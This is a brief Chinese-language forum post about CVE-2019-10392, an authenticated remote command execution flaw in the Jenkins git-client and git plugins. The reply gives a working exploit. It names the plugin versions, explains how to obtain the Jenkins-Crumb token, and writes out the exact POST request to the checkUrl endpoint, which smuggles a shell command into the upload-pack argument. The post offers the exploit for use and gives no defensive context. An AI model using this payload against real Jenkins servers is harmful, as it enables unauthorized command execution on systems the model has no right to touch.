CVE-2019-10392 Jenkins 2k19认证远程RCE

adminsb 2月前 123

最新回复 (1)
  • adminsb 2月前
    0 引用 2
    只需要安装了git-client 2.8.2下和git 3.12.0下即可
    访问192.168.253.139:8080/job/test2/configure 获得Jenkins-Crumb
    再访问192.168.253.139:8080/job/test2/descriptorByName/hudson.plugins.git.UserRemoteConfig/checkUrl   post:value=--upload-pack%3D%22%60id%60%22&credentialsId=
    即可执行命令。
    test2为任务名

返回